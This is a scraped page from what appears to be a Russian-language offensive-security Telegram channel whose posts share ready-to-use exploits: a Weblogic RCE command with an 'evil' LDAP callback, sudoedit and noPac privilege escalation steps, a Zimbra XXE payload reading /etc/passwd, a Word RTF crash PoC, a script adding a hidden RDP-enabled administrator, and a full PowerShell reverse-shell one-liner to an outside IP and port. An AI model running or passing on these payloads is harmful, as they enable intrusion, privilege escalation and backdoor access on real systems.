Похек – Telegram
Похек
16.2K subscribers
2.09K photos
110 videos
243 files
3.05K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @PoxekAds_bot или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Weblogic CVE-2023-21839 RCE

Linux/Mac OS
 cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Windows
 cmd
go build -o CVE-2023-21839.exe
CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil
Автор улетит скоро! Когда вернусь, продолжу посты)
👍5🐳4🔥1🌭1
Forwarded from Monkey Hacker
Sudoedit Privilege Escalation (CVE-2023-22809)

#RU

Проверьте, что вы можете использовать sudoedit

cat /etc/sudoers

Введя дополнительный дэш, мы можем заставить наш редактор работать от имени root

export EDITOR='vim -- /path/to/your/files'

Теперь вы можете читать/писать файлы с привилегиями root

sudoedit /etc/custom/service.conf

#EN

Check that you can use sudoedit

cat /etc/sudoers

By introducing an extra dash, we can make our editor work as root

export EDITOR='vim -- /path/to/your/files'

Now you can read/write files with root

sudoedit /etc/custom/service.conf

Tools:

https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc
This media is not supported in your browser
VIEW IN TELEGRAM
🎉8🐳1
CVE-2023-21716(Microsoft Word RCE vuln) Python PoC

open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))
🔥5
XXE to RCE Zimbra CVE-2019-9670

Всем привет! Проводя один из пентестов был найден Zimbra сервер. В ней была найдена очень интересная CVE-2019-9670. Если кратко, то это экплуатация XXE для получения RCE. Звучит интересно, да?)

Payload XXE:
 xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
</Request>
</Autodiscover>

Ниже приведу парочку примеров, как эксплуатировать эту вулну.
Metasploit:
msf > use exploit/linux/http/zimbra_xxe_rce
msf exploit(zimbra_xxe_rce) > show targets
...targets...
msf exploit(zimbra_xxe_rce) > set TARGET < target-id >
msf exploit(zimbra_xxe_rce) > show options
...show and set options...
msf exploit(zimbra_xxe_rce) > exploit

Arambiz - эксплойт на Python3:
 clone https://github.com/oppsec/arbimz.git
pip3 install -r requirements.txt
python3 main.py --url https://example.com/

Zaber - эксплойт на Go:
 install github.com/oppsec/zaber@latest
zaber -u https://example.com
Если у вас не находит бинарь, то пропишите абсолютный путь.
 -u https://example.com
А после работ не забудьте добавить $HOME/go/bin/ в свой PATH 😉


Все 3 сплойта отлично срабатывают, но есть пару нюансов.
Плохой нюанс кроется в Zaber. У него нет функции TLS verify skip, поэтому если будет кривой серт на сайте и только 443 открыт, то пользуйтесь Arambiz)
Хороший нюанс, даже если Arambiz не сможет достучаться до веб шела, то вы всё равно получите креды администратора. Поэтому постарайтесь найти логин форму и вы получите админку без веб шела.

Буду рад, если распространите этот материал!
Пользуйтесь на здоровье, но не думайте блечить 😉
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7
Forwarded from Monkey Hacker
Сreate user via bat file extension

#RU

На данный момент изучаю Windows и его приколы.
Вот вам скрипт, для создания пользователя с правами администратора и с включенным RDP.

#EN

I am currently learning Windows and its tricks.
Here is a noscript to create an admin user with RDP enabled.

net user test password /add
net localgroup Administrators test /add
net localgroup “Remote Desktop Users” test /add
reg add “hklm\system\currentcontrolset\control\terminal server” /f /v fDenyTSConnections /t REG_DWORD /d 0
CVE-2023-23415 ICMP RCE

Злоумышленник может удаленно использовать эту уязвимость с помощью ошибки протокола низкого уровня, содержащей фрагментированный IP-пакет в заголовке, который отправляется на целевую машину", - говорится в сообщении Microsoft.
Уязвимость затрагивает следующие продукты Microsoft:
Windows Server 2008@(-∞, Mar 14, 2023)
Windows Server 2012@(-∞, Mar 14, 2023)
Windows Server 2016@(-∞, Mar 14, 2023)
Windows 10@(-∞, Mar 14, 2023)
Windows 11@(-∞, Mar 14, 2023)
Windows Server 2022@(-∞, Mar 14, 2023)
Windows Server 2019@(-∞, Mar 14, 2023)

POC'a пока нет(

#CVE
Forwarded from Monkey Hacker
Domain Admin in a few seconds (CVE-2021-42278 | CVE-2021-42287)

Такой способ повышения уже существует почти два года, однако этот способ актуален и интересный. А какие компоненты оно затрагивает?

1. По стандарту в настройках, обычный пользователь домена может присоединить компьютер к AD только 10 раз.
Чтобы это проверить, можно выполнить следующую команду:

Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota

Чтобы отличать учетные записи пользователей от учетных записей компьютеров, они должны иметь в атрибуте sAMAccountName на конце $. Однако прикол в том, что этот символ не всегда проверяется. Атрибутом имени учетной записи компьютера является sAMAccountName. Этот атрибут можно увидеть и отредактировать вручную с помощью ADSIEdit Tool

2. При запросе билета на обслуживание сначала необходимо предъявить TGT. Если запрашиваемый билет не найден KDC, KDC автоматически выполняет повторный поиск с последующим $. Если TGT получен для username, а пользователь username удален, то используя этот TGT для запроса сервисного билета для другого пользователя через S4U2self приведет к тому, что KDC будет искать username$ в AD.

Объединяя эти вулны, мы имеем примерно такой сценарий

Пользователь запрашивает TGT. Затем пользователь может попытаться удалить или переименовать исходную учетную запись компьютера. Получив TGT, пользователь может начать эксплуатировать sAMAccountName. А полностью зная, что KDC поставляет тикеты и временные сеансовые ключи пользователям и компьютерам в домене, мы это можем использовать для повышения привилегий

Сценарий эксплуатации выглядит так:

1. В домен добавляется новая учетная запись компьютера.
2. Созданная учетная запись компьютера переименовывается в соответствии с именем существующего контроллера домена
3. Запрашивается Kerberos TGT с использованием обновленного имени учетной записи компьютера.
4. Созданное имя учетной записи компьютера снова переименовывается в исходное значение.
5. Сервисный билет Kerberos запрашивается с использованием расширения S4U2self

Звучит душно, благо есть noPac, который эксплуатирует данную проблему

THX:

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

https://github.com/elastic/detection-rules/blob/a5359ca675267220afedf67795cd1fd04881b2c8/rules/windows/privilege_escalation_samaccountname_spoofing_attack.toml

https://github.com/WazeHell/sam-the-admin
4
This media is not supported in your browser
VIEW IN TELEGRAM
Adobe Acrobat Reader CVE-2023-21608 RCE: разбор уязвимости

В этой статье мы рассмотрим, как использовалась уязвимость use-after-free в Adobe Acrobat Reader DC. Ошибка была обнаружена в ходе проекта по фаззингу, направленной на популярные программы для чтения PDF. В итоге была успешно использована уязвимость для удаленного выполнения кода в Adobe Acrobat Reader.

#CVE #RCE #моястатья
🌚4🔥2
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from Proxy Bar
PowerShell открывает TCP-сокет на удаленном сервере и выполняет ввод в виде команды, отправляя вывод обратно.
Тупо бэкдор!

usage:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('106.12.252.10',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
🔥1
Foxit PDF Reader CVE-2022-28672 RCE: разбор уязвимости

В этой статье расскажу об уязвимости, обнаруженной при оценке безопасности популярных программ для чтения PDF. На этот раз была обнаружена уязвимость use-after-free и несколько других багов в Foxit PDF Reader во время фаззинга. Мы смогли успешно использовать эту уязвимость для удаленного выполнения кода в Foxit PDF Reader.

#CVE #RCE #моястатья
4
Exegol

Exegol - это хакерская среда, управляемая сообществом, мощная и в то же время достаточно простая, чтобы каждый мог использовать ее в повседневной работе. Exegol - это лучшее решение для развертывания мощных хакерских сред безопасно, легко и профессионально. Exegol подходит пентестерам, CTF-игрокам, bug bounty ресерчерам, начинающим и опытным пользователям, защитникам, от стильных пользователей macOS и корпоративных профессионалов Windows до опытных пользователей UNIX.

Установка:
git clone https://github.com/ThePorgs/Exegol.git

#tools
🐳3
Ghostcat
CVE-2020-1938

Чтение и выполнение файлов, вызванное произвольным установкой атрибутов протокола tomcat ajp.
Эксплойт выполняет следующие функции:
 файла
Выполнение файла
Сохранение файла

#CVE #RCE
🐳4
Forwarded from APT
Veeam Backup and Replication (CVE-2023-27532)

Vulnerability in Veeam Backup & Replication component allows encrypted credentials stored in the configuration database to be obtained. This may lead to gaining access to the backup infrastructure hosts.

Research:
https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive/

Exploit 1:
https://github.com/sfewer-r7/CVE-2023-27532

Exploit 2:

https://github.com/horizon3ai/CVE-2023-27532

#veeam #credentials #rce #cve
Мы очень активно растем!

Всех вас люблю ❤️
Please open Telegram to view this post
VIEW IN TELEGRAM
11🎉3
Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент взодим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни Команда CTF- RedHazzarTeam приглашает в свой состав начинающих специалистов или имеющих опыт в решении задач по криптографии , пывну и реверсу! Молодая амбициозная команда, в настоящий момент входим в топ10 рейтинга ctftime по РФ. Приветствуются активное участие в жизни команды, бешеное желание изучать разные аспекты ИБ. Если вас заинтересовало предложение, пишите в лс (@Hazzarim139)
🤝3
This media is not supported in your browser
VIEW IN TELEGRAM